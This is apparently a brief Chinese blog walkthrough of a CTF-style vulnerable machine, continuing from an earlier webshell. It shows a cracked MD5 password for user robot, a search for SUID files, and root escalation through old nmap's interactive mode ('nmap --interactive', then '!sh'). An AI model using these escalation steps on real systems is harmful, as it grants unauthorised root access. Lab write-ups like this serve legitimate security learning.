::: {.container}
::: {.post}
::: {.show-content}
前景提要:上次通过爆破后台,修改404.php获得一个webshell。现在学习提权。

id、whoami、hostname

信息:daemon用户,uid=1说明是系统用户,主机名linux

cd home/robot

信息:获得另一个key(2/3),和passwd文件,文件内容:

robot:c3fcd3d76192e4007dfb496cca67e13b

MD5解码:abcdefghijklmnopqrstuvwxyz

(⊙﹏⊙)这个明显是偏CTF,而不是模拟真实渗透环境啊。

su robot/abcdefghijklmnopqrstuvwxyz


寻找有SUID权限的文件。

::: {.image-package}
{.uploaded-img
width=”auto” height=”auto”}\

::: {.image-caption}
:::
:::

于是通过nmap提权。

查看nmap版本:/usr/local/bin/nmap --version   或者 nmap -V

老版本的nmap(2.02-5.21)有一个交互模式,使得用户可以执行shell。

nmap --interactive

!sh

pwd

cd root

ls

获得第三个key.
:::
:::
:::